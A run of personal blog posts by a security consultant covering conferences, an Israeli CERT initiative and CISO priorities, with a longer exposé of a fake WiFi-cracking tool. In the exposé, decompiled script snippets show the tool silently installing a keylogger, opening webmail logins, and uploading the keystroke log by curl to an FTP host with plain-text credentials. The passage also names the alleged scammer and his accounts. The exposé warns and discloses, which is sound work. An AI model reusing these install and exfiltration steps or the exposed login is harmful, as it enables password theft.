One of the first feedback I got arrived through twitter. the next few came in to my inbox, then LinkedIn, more twitter, and some text messages. Wow. Have I realized that twitter got to be as important as LinkedIn was I would have tweeted my move there first . Anyway, to finalize the social media roundup if the news here it is:

After a long period of working alongside several great companies, I am proud to announce that the current activities of Security & Innovations are merged with Security Art. Some of you are already familiar with the ongoing relationships between the companies, and now it’s official. 
I’ll be serving as the Vice President for Business Development at Security Art starting immediately, and will continue to do what I enjoy the most – working with great people, find solutions that make sense for everything security related, and keep that great mix of business, marketing and hardcore technology. Security Art has managed to build a rock-star team of professionals (some of which I personally helped recruit) and I’m excited to be able to formalize this relationship and be able to offer even more to our existing and new customers, partners and colleagues. 

If you have any questions, opportunities or any other topic you’d like to discuss related to this please feel free to contact me personally. We are gearing up to announce even more exciting news pretty soon as we are expanding our line of business. Keep an eye on www.security-art.com or follow us on LinkedIn…

Related posts:

1. Cloud Security Alliance Conference (Israel) – CFP
2. Social networking strikes again
3. Getting a business degree as part of Security Research?

So, down to business, SOURCE Barcelona is going to be awesome – It’s going to be my first SOURCE I’m really looking forward to getting back together with some of my friends (Chris, Wim, Jayson… the old Wuxi pwnage team en-scale), and meet people I wanted to pick their brains in person (Brian Honan – especially because I’ll miss his talk…).

Next up is Brucon. I’ve said enough about Brucon in the last conference schedule update, nevertheless, it’s shaping up to beat it’s last years’ reputation. Expecting great talks, great crowd, and awesome beer! As far as talks I’m looking forward to – will definitely catch up with Joe which I missed at DefCon, Craig who’s Skylab is of a personal/professional interest to me, Dale with the HeadHacking talk, and Fabian’s GSM one. Obviously there are many more, but as I’ve learned over the years – don’t be greedy (especially not at conferences)…

Last but definitely not least, Excaliburcon is going to happen after all! This year the location is going to be just outside of Beijing. We will all miss Wuxi a lot, but I’m really looking forward to checking out more of China. It was a great experience last year and I’m setting up my hopes pretty high for December as the speaker list is getting pretty hot!

The common threat across these three conferences is that unlike the “big ones”, they all allow the attendants a very close interaction with the talks. This really enables more information sharing and knowledge transfer, and I’ve really learned a lot more from smaller conferences such as these than from the big ones that sport a dozen tracks at the same time (think RSA… you are not going there for the content anymore…).

If you happen to be at one of those, feel free to ping me (or even better – buy me a beer )!

Related posts:

1. Upcoming Conference Schedule
2. ExcaliburCon summary and general China notes
3. The community to the rescue again

Matthew Shoemaker, one of the podcasters along with Rick Hayes, has passed away last Friday. He left a wife and two kids behind him.
I have had the great honor of being on the podcast, and to have a great conversation (on, and off the air) with both Rick and Matthew.

For donations to the Matthew Shoemaker memorial fund which would help out his wife and kids, Rick has set up a PayPal page – http://bit.ly/cVDsID.

No related posts.

So, we all know about the security scammer now, and the different ways he is working to defraud innocent users and steal their data and money. It has been quite an experience tracking this scam down and getting all the facts right (from the technical aspect of inspecting the keylogger and binaries used to sniff your data, to actually communicating with the scammer and getting his take on things).

Nevertheless, I must say that I appreciate the consistency in which our scammer (I’ll call him Fadzil Mahfodh as that’s his real name) has been trying to mask his wrongdoings. From trying to go around the facts and divert us to other software:

To “bragging” about his skills and the fact that his scripts are “leet” enough to get past some people:

And finally to the obvious – throwing a fit and trolling – initially by threatning to post my picture and CV on adult websites (what would my CV be good for on an adult site anyway??? must be a Malaysian thing ):

All of which has been accompanied by adding my picture to his website (wow! I’m famous now!):

Getting it removed by the Google Blogger DMCA team, opening up a new blog site to accompany the specific “hack wpa without a dic” post along with my picture, and making some cosmetic changes to the site, removing the FBI log (which has been replaced with a larger DHS logo), and adding a disclaimer at his website stating that this is all a mistake, that I have been trying to pressure him into criminal actions, and that he has all our communications logged and will be happy to use it to prosecute. Too bad this has been removed from his site before I had a chance to document it – but trust me it was there! Pure epicness!

Now, I know – it’s not really fair to pick on these guys that hard. That’s why I’m leaving this to the Malaysia CERT (as you may have noticed, 1337 Fadzil forgot to proxy his connections to this blog and his IP has been logged on all comments and relevant hits on the site), to figure out how to handle. I truly hope that his suggestion to use the details provided on his paypal account and bank account will actually yield some results, and wish our friend the best of luck in his endeavors in the security business (although I highly doubt he’ll be at DefCon later this week).

Below are attached some of the additional supporting materials for the sake of fully disclosing all the communications with Fadzil.

Apache-access-log_FILTERED, Fadzil-chat, karma-decoded.sh, bg2-decoded.sh

8/18/2010 – Last update (I really hope)

All right, so it seems that the good guys actually win sometimes, so I had to post this quick update just to fill everyone in on what has been going on:

1. The original site (yeah – the bad design, background music, scam outright) has been brought down. Not sure if it was the Google DMCA team that kept bugging Fadzil on removing my pics, or the Malaysia CERT that came down on him for the malicious and scamming techniques.
2. The replacement site (chikiabu.blogspot.com) which has been originally set up just to host the infringing materials after Google rained down on Fadzil, is now actually the main site, and SURPRISE – it does not have the scamming software anymore!!! 2 points for the good guys.
3. The new site still has some “security” software. I have been getting some questions from readers who saw it and didn’t know whether to use it or not. So I had a few minutes to spare today, and have analyzed the “software” provided on it (namely – the famous fi.sh script which is the pinnacle of our subject’s programming skills). Long story short – still scripting with no real software in it. The fi.sh code is (again) a compiles shell script, and… here it is: fi.sh (the decompiled version of course). Funny thing is – obviously there’s no real coding here, just a bunch of “infconfig”, “iwconfig”, “airodump-ng” and “aircrack-ng”. One thing to note though, is that Fadzil makes it look as if each version of the script is designed for a specific wireless adapter – this of course can be achiever by correctly configuring your wireless adapter when running BT. Additionally, the posts on his website still entice users to send him their capture files (although at some point he makes the spelling error of saving a capture file as “.cab” – freudian?), and I’m guessing that he’s going to be asking for some “donation” to keep his site running. Don’t be tempted again kids…

That’s all there is to it I guess. Again – good guys win, site cleaned (and hopefully bad guy learned his lesson). Keep your eyes open out there, and until next time (September in Barcelona and Brussles) bye!

Related posts:

1. How [not to] scam security people
2. The China/Google thing, accountants and other miscreants
3. Cyber[FUD]Fare – repost from fudsec.com

Now, this is nothing new, and as I stated before, has been going on for years. I’m not even going to go to the political discussion on whether this is sponsored by the government (or have been turned a blind eye by it), as opposed to Israeli hackers that would like to retaliate but know that they would be charged in their country for computer crimes.

No.

The focus here is that there was such a huge media outrage over the fact that so many (more than 100,000) user accounts have been affected, and everyone is scrambling to figure out who should have notified who on what. A couple of funny things to consider in this incident:

1. There are more than a couple of companies in Israel that specialize in gathering intelligence on such forums as their core business. One company has even been quoted that they knew of this issue months ago.
2. Some of the accounts that have been breached belong to government personnel (or at least have a .gov.il email account with it’s corresponding password).
3. The sites that have been breached were not notified until a couple of days ago. They have no-one to consult with in terms of how to handle this incident, or how to fix their issues (ever heard of one-way password hashing??? apparently not…).

Why am I bringing up these specific point? Let’s see, and now from a perspective of a normal CERT that if would have been here would have addressed these as follows:

1. Companies that deal with security research can send their insights over local security incidents to a coordinating entity – IL-CERT that would manage the anonymous and responsible notification to the affected parties. No need to figure out a local policy for notifications, no need to dig out contact details for obscure police departments and guesstimate whether they even care about your data, and no need to get into the politics of the existing semi-CERTS and who they constituency is.
2. Coordination and notification to government related bodies would  be handled through the ILGOV-CERT (although their website is not too promising, there are ways to reach them…). Additionally, collateral damage notification would also be handled in the same way (i.e. – a .gov.il site has not been breached, but .gov.il account have been found through breaching a .co.il server. This is the kind of thing that ILGOV-CERT does not know how to handle right now…).
3. Incident handling support and assistance would have been provided by subject-matter experts to any site that have experienced a breach. No cost associated (unless actual work on the servers or code would have been sought after, in which case the IL-CERT would have probably done a referral as initially it would not be a commercial body).

Simple huh? And you keep wondering how come a place where so much innovation in science, technology and security has come from is still in the dark ages of it’s own internet security…

Related posts:

1. FIRST and IL-CERT
2. Cyber[FUD]Fare – repost from fudsec.com
3. The China/Google thing, accountants and other miscreants

It did not take too long, and with the accidental help of TechCrunch (btw TechCrunch – you may want to change this link to something else after you read this…) I ran into this “Wifi Security” site.

Yes, I know, the design is horrible, the scrolling thing on the top of the page is just missing a <blink> tag to drive you into an epileptic seizure, and the music, well, it’s music as part of a website – welcome to the 80’s.

Not being deterred by the horrible design, I went ahead and downloaded the “tools” offered in the article. After all, the FBI are using this guy’s tools…
A quick look, and I was faced with three supposed shell scripts (ended with a .sh), and a tarball called “rogue.tar.gz”.
When you get a shellscript that isn’t a shellscript, and is being reported as an “ELF” executable, you should get your detective hat on, which is exactly what I did.
It didn’t take long, and the scam unfolded pretty quickly. Here’s a quick recap of what’s going on with this guy’s website:

1. The provided “tools” aren’t even security tools. Initially I figured – ok, so this guy packed a few open source wireless tools and scripted them for easy usage. No. Not even karma which the main script suggests that is being used (appropriately I might add for the purpose of what this script is SUPPOSED to do).
2. A quick look at the tarball revealed that is actually contains a keylogger that has been graciously stolen from here.
3. When the main script (karma.sh) is run, two supporting scripts (bg1.sh and bg2.sh) are launched. They are taking care of compiling the keylogger, running it, and pushing the logged keys logfile to an FTP for the attacker (I guess we can call him that now) to use at his convenience.
4. You are prompted to log into your webmail account, send a request for a free activation code with an indemnity text, which would be answered by the “automatic” processes on their end promptly so you can enter the code into the installer and start playing around with WiFi security. FTW!

Observant readers may notice that I referred to the tool as having “supposed” script files, that are actually binaries, and now I refer back to them as scripts. What gives?
Well, simply put, our attacker didn’t really take the time to code an application, he just wrote a couple of shell scripts, and in order to try to hide his malicious and ill-intent actions he “compiled” them with a utility that packs shellscripts in executable form called shc. The road from a linux executable to realizing what the script originally was is pretty short…

Now, that most of the cards are on the table, we can actually take a look at what scam this guy is running, and how he runs this. Following are some snippets from the shellscript that was presumably a wireless security tool. Even if you are not an avid Linux shellscripter, I’m sure that the annotations (true to the original) will shed some light…

# START BACKGROUND PROGRAMS BG1(RUN LINUX KEYLOGGER) AND BG2(RUN MONITORING KEYSTROKES AND SEND LOG.TXT FILES TO DRIVEHQ)
cd lkl2
./configure –silent
make –silent
make install –silent
cd
chmod +x /root/bg1.sh
nohup /root/bg1.sh &
rm -r /root/nohup.out
chmod +x /root/bg2.sh
nohup /root/bg2.sh &
sleep 2
rm -r /root/nohup.out
clear

So, we see how the keylogger is compiled, installed and the supporting scripts bg1 and bg2 are run.
Next up, is the installer itself (if one can call that) which prompts for the user to send a FREE activation request to the attacker:

# MENU LIST
echo “”
echo “——————————————————— “
echo “THIS MESSAGES WILL NOT APPEAR AFTER karma.sh IS ACTIVATED “
echo “——————————————————— “
echo “”
echo “1. Compose indemnity text below and send to fadzilmahfodh@gmail.com”
echo “ Yes, I want activation code and will never use for illegal purpose”
echo “”
echo “2. Check your email for activation code after sending text “
echo “”
read -p “3. Send now ? (0=no, 1=yes) “ act
clear

Obviously, the message WILL appear, as this thing is NEVER going to be activated – remember – this is a shellscript, and the “menu” appears as-is unconditionally so you can try to activate this until blue in the face… but we are getting ahead of ourselves.

I mentioned in the title that the scam is targeting security people. Besides the obvious wireless security related topic, here’s another little piece of “evidence” from the script:

read -p “Which backtrack are you using ? (bt3=3,bt4=4) ” bt

Our little friend is assuming that we are using BackTrack (as most security folks do) to run their wireless tests… the script continues according to which version of BT is entered (to accommodate the differences in network configuration…).
I’ll skip through the network connectivity checks (trust me), and next up the attacker makes sure that firefox isn’t running, and:

firefox https://login.yahoo.com/ &
sleep 4
firefox https://www.google.com/accounts/ManageAccount &
sleep 4
firefox http://home.live.com/

The attacker obviously wants us to log into one of our webmail accounts so we can send him that activation request email with the indemnity text (how considerate). Keeping in mind that the keylogger is on and it’s activities are uploaded in the background to the attacker’s FTP – this is exactly where most people will fall into the trap.

And for the grand finale – the actual activation (you’d think huh?):

############################
# DECOY FOR ACTIVATION CODE
clear
echo “”
read -p “ENTER ROGUE AP ACTIVATION CODE : ” pls
sleep 3
echo “You have entered an invalid code ”
echo “”
exit
############################

You have to admit that commented code is the best! It’s actually saying “decoy”! How f*&^ing awesome is that? You get to craft your email after logging into your Yahoo!/Gmail/Live account, and then go back to this completely useless activation part. I do like the fact that the author put a “sleep 3” before letting you know that you entered the wrong code. As if it was hard at work verifying it. Classic.

That’s about it for the technical analysis, but it wouldn’t be complete without the actual interaction with the attacker, wouldn’t it? Let’s see – so, we crafted a “request for free activation” email with the indemnity text in it, and guess what – we got a reply!

Hi

1. We are preparing the activation code for you.

2. To make worth our while, could you consider a small donation (suggest euro 11) to support the website via Paypal a/c fadzilmahfodh@yahoo.com ?

Cheers.

EMAIL VIA MY CELLPHONE FOR FAST RESPONSE
http://fadzilmahfodh.blogspot.com

So not only there is no activation code to be “prepared” for me (what? I’m going to feed it to the “decoy” and it’ll magically work?), we are being prompted to donate some cash for the poor bastard who worked so hard to make this tool for the community…
I cordially answered that:

1. Thanks. I’ll be looking forward for the activation code.

2. I’ll probably consider it after being able to test out the tool.

Which was replied with a suggestion to try the trial version on his site (which relates to a completely different tool, but let’s not be too picky about it…).
Now, thankfully, I was using one of my throw-away yahoo accounts, and apparently so our attacker. If you haven’t noticed, one of the cool things in the new Yahoo! webmail is that you get an indication whether the person emailing you is online or not, and you can chat with them!
Guess what happens next…

—– Our chat on Wed, 7/7/10 2:53 PM —–
Iftach(2:34 PM):  hey man
Iftach(2:34 PM):  mind if a ask a couple of questions?
fadzilmahfodh(2:34 PM):  okey
Iftach(2:35 PM):  cool. I’m doing this research on security tools and their
authors…
fadzilmahfodh(2:35 PM):  okey
Iftach(2:35 PM):  saw your tool and wanted to hear about how you got to write
it, how well is it distributed in the community etc…
Iftach(2:36 PM):  does that activation thing a common practice with free tools?
fadzilmahfodh(2:36 PM):  yes see, we need to maintain our website thus we need
supporter
fadzilmahfodh(2:37 PM):  everyday there are at least 500++ people asking for
code
Iftach(2:37 PM):  I see.
fadzilmahfodh(2:37 PM):  i no longer able to provide for free
fadzilmahfodh(2:37 PM):  too time consuming and i need to be compensated for my
time and effort
fadzilmahfodh(2:38 PM):  hope you understand

Time and effort? Right… For a scam script that doesn’t even have any networking functionality… Ok, I’ll go along…

Iftach(2:40 PM):  now, about the tool – that’s a linux binary obviously (thought
it was a shell script at the beginning). Did you base it on something existing
or write yourself?
fadzilmahfodh(2:41 PM):  i wrote it by my self then scramble the code
Iftach(2:41 PM):  hence the activation i see…
fadzilmahfodh(2:42 PM):  i can afford to give ‘free lunch’ to everybody. Hope
you understand
Iftach(2:43 PM):  sure, i understand.
fadzilmahfodh(2:43 PM):  So you interested in the software?
Iftach(2:44 PM):  more from a research point of view – for an article I’m
writing
Iftach(2:44 PM):  so, the installer you use, I see that it contains some
additional code that is being compiled on the client.
fadzilmahfodh(2:45 PM):  Yes. The purpose is the code will be unique to user
hardware
Iftach(2:45 PM):  and I saw that there were some FTP connections made? Is that
to verify that the client is a registered one?
fadzilmahfodh(2:46 PM):  Well, that is another story…
Iftach(2:46 PM):  I’m listening
fadzilmahfodh(2:46 PM):  maybe some other time huh
Iftach(2:47 PM):  OK. Last question – do you get a lot of account passwords
through that keylogger that sends the data to your FTP?
fadzilmahfodh(2:47 PM):  sorry, no comment unless i am in court

At this point of my “interview” with him, I guess that my cover was going to get pretty real, hence this “article” that you are reading… You can’t make this stuff up so I figured I’ll blog it…

Iftach(2:48 PM):  aha, and it’s part of the installer because? just to make sure
people can send the activation email correctly?
Iftach(2:48 PM):  Back to statistics, out of the average 500 ppl asking for
activation – how many passwords do you manage to grab?
fadzilmahfodh(2:49 PM):  well, the ftp is to confirm that software match with
data in server
fadzilmahfodh(2:49 PM):  if it does not match, it will fail to run
fadzilmahfodh(2:49 PM):  or i can just change the data/activation code in the
server
fadzilmahfodh(2:49 PM):  then everything will not run
Iftach(2:49 PM):  and how does that relate to the keylogging?
fadzilmahfodh(2:50 PM):  well, that i another story…
Iftach(2:51 PM):  I mean – the keylogger data is sent to that FTP. Is that part
of the verification or is this a separate process?
Iftach(2:51 PM):  So, on average, how many accounts you manage to get on that
FTP server per day?
fadzilmahfodh(2:51 PM):  well, you do not even support my website and how the
hell am i going to tell you
Iftach(2:52 PM):  Let’s just get it straight – I’m not going to “support” the
site… I’m just doing some research on security tools.
fadzilmahfodh(2:52 PM):  bye
Iftach(2:53 PM):  You are free to tell, or not if you don’t want to. But I’m
publishing the story as it is…
Iftach(2:53 PM):  With your acknowledgment that you use a keylogger to steal your
site visitor passwords. Unless you want to be quoted otherwise in the story…

True to my chat with Fadzil (or whatever his name is), I’m telling it the way it is.

But wait, there’s more!!! more? how come? well, just to put some icing on this, I went back and decoded the script that was in charge of the FTP upload…

curl -s -k –ftp-ssl -T /pentest/log.txt -u fadzilmahfodh:buaya ftp://ftp.drivehq.com/code$number.txt

Just to see the final lameness come to life as I tested the account:

And you know what – it’s all our fault! If we as a community would have “donated” to this guy for all his hard work and effort that he’s been putting in creating tools that are used by the FBI (check out his site…), he would have had the money to keep his driveHQ account in order and could make a decent living out of ripping people off.

Seriously.

p.s. you can find me talking about this entertaining even on the ISDPodcast with my buddy Rick, I just had to vent off before putting this in writing, so hopefully this account is a bit more thorough and to your liking…

Update 7/13/2010: I could not have wished for better response from the community on this post, but having the actual culprit respond here is priceless. As you can probably see, Fadzil has posted a comment, and to sum things up let me just state that I’m not that surprised by its content (I think it’s called “pulling a ligatt” these days…). On one hand he offhandedly dismisses that there was ever such an issue with a keylogger, on the other hand he promises a better version with (and I’m quoting): “rogue ap + fake login page + keylogger + ftp = to get WPA or WPA2 password”.

You don’t say?! I’m still waiting for the security practitioner that will explain to me why would anyone need a keylogger + ftp to use a rogue AP with fake login pages. I’m really hoping that this post helps the community learn more on criminals such as the one we are dealing with here. Don’t be tempted to “smooth-talk” that tries to look technical and hackerish while having nothing behind it. And if you have had any additional experiences with this guy feel free to add them to the comments or email me so I’ll update this story for everyone’s benefit.

Related posts:

1. Tying up loose ends before Vegas (scammer closure)
2. Credit cards on a clearance sale and your internet security
3. The Turkish hack and another case for IL-CERT

We expect to have great participation from all areas of the industry, are working on a great venue to host the conference, and are opening up the Call for Papers.

Please see the CSA-IL WiKi for additional information on how to submit for the CFP:

http://wiki.csail.dreamhosters.com/wiki/CSA_conference#Call_for_papers

Looking forward to seeing you all there!

Related posts:

1. Upcoming Conference Schedule
2. ExcaliburCon summary and general China notes
3. Updated speaking schedule!

So, one time, at security camp, I figured that there isn’t a whole lot of infrastructure in my back yard to really call a decent CERT. I have experienced that multiple times (and again and again) when handling major incidents that prompted incident handling in dozens of countries around the world, and when trying to do the same back home (in Israel), I got “bobkes”.

The thing is, there are currently two “CERTs” operating in Israel – an academic one (ILAN-CERT) which only server a portion of the actual academic networks in Israel (surprise surprise…), and CERTGOV-IL (which seems to be mostly in maintenance mode, and only server the government sites). Bottom line – if you want to report an incident that does not fall into these CERTs constituency (about 90% of the cases), you are out of luck…

So, just like the ever-optimistic fool that I am, I decided to give it a try and start a normal IL-CERT. Back at the time when I started to dance the political/bureaucratical dance I figured that it would be a good idea to present at FIRST2010 as IL-CERT would be alive by then. Ahhh, the optimism…

Months went by, emails flew, and meeting were held, and I arrived at the FIRST conference with only a glimmer of hope for a decent CERT. I almost dropped all hope for it, but then had a great time running into the FIRST crowd. Every time I got into a conversation with a member, I usually got the same question: “so, can I send you information on incidents in Israel? Because there isn’t anyone to send data to for years”.

Embarrassing. Nothing less (and to think that there was another Israeli “CERT” member onsite…). Long story short – I’m currently willing to put my hiney on the line and at least be able to say that I tried.

So here goes – I’m publishing an open call to anyone local who would like to participate and contribute to the IL-CERT. Also – if you need/want to report on any incident related to the constituency of a decent IL-CERT, please feel free to pass it my way until we set up the basic infrastructure for IL-CERT.

Wish me (us?) luck and godspeed. And thanks again to everyone who I met at FIRST-2010 and have reinforced my crazy endeavor.

Related posts:

1. The Turkish hack and another case for IL-CERT
2. Cloud Security Alliance Conference (Israel) – CFP
3. Taking the Red Pill Down the Rabbit Hole

The question is usually presented by someone who’s in charge of “Security” in an organization. Now, I wouldn’t have had a problem with this if this was a technician, or a pen-tester of sorts, but I get really nervous when the CISO/CIO/Security manager is the one asking.

I think that this question is highly inappropriate for two reasons:

1. You should not be looking for “technology”. Buying a product is not going to make you more secure or less secure.
2. You should not be trying to protect a technology. Your servers, networks, routers, PCs, etc… are not the focus of information security. The information is…

Having been working with senior management – sometimes as an advisor/consultant, and sometimes as a “virtual CISO”, I know that this is not what we expect the CISO or security manager to ask. We expect business savvy, we expect an understanding of what the information assets are, what are the information critical paths, who owns the information and what is the impact of every asset on the business. We expect that the understanding of how each assets fits into the grand scheme of things would be clear to whoever is in charge of securing it, and we expect them to take into account what is the potential damage related to each of these assets (in terms of losing it, having it fall into the wrong hands, etc…).
For me (or us when talking as management) this is the only way to approach security. Funny how things get a little unclear when all you thought you needed to know was which vendor/product fits where in your topology, huh?

What strikes me as most peculiar is the fact that a lot of these security “professionals” find themselves in a self proclaimed identity crisis, having to deal with business requirements and financial understanding of how the business operates. and the weirdest thing is that they often choose to get back to what then “know” best – the technology side of things. Definitely not the way to make a move…

I’m really hoping that all this preaching of “know thyself before you know your enemy” would help somehow, because right now unfortunately the situation at hand only brings us more business (not that I’m complaining). But seriously now – technology is fine and cool, but having the aptitude to know where it fits, not on an architectural level, but from a business perspective is the key to what we do. Get back to the drawing board, erase the network topology and start drawing the business one!

Related posts:

1. Practical vs. Regulatory – the votes are in!
2. Who owns your online identity? Facebook squatters on the rise
3. Being in the middle (or: things we didn’t manage to learn in a decade)

It all started in Berlin when I realized what an amazing community we have. People from all over the world coming over for 3 days of sharing, networking and listening to talks (oh, and partying). I also have the great honor of calling a few of these guys friends. Friends that I know that I would be honored to help if they needed anything, and friends that I know I can “drop on” if I happen to get into a snag in their hometown. Friends that I only see in-person 2-4 times a year, but still consider them one of my closest.

I saw borders dissolve in an instant as politics, geography and history dropped in sight of a beer or a cool PoC demo on someone’s PC, and I had great conversations with people I just got to know and am sure will run into again in the future.

And then I got back home. I don’t need to mention the unfortunate events that took place a couple of days ago, and I’m not going to point fingers at anyone. Everyone had their agenda, some sides were more optimistic, some had better planning, some had better intent, but the end result is what it was. Sometimes as we say it’s better to be smart than to be right…

That was just a day before I flew over to Athens to talk at Athcon. People around me started freaking out, having the entire area feel like a barrel of gunpowder, and the media adding in some FUD to top it off. And then I recalled ph-neutral. A couple of hours later, a friendly cabbie and what looks to be a really cool con, everything is left behind. The community wins again, while politicians keep meddling with their agendas.

I just hope that more people could find such communities where borders are bridged, and religion/ethnicity/gender become irrelevant in light of a common cause/interest. I’m truly happy that I had a chance to debunk myths that I’ve had in my mind, and other people had in theirs, and really hope that this focus on a common interest could work elsewhere.
Now off to polish off my presentation for tomorrow. Stay safe out there!

Quick update [6/7/2010]: Athcon was fantastic! I’ve had a great time in Athens, had a chance to finally meet some really brilliant minds that I’ve been following for some time online, and was fortunate enough to experience the famous greek hospitality. I am reassured with my previous assumptions that all these politics are just the attempt of politicians to prove that they are worth their salaries (hint -they don’t). We just want to live our lives quietly – the only reason for some kind of army/politicians is to fend off anyone who wants to disturb this (terrorists).

Back to work now, as I need to start prepping for Miami next week…

Related posts:

1. Updated speaking schedule!
2. CyberCrime, CyberWarfare, and 2010
3. ExoticLiability podcast interview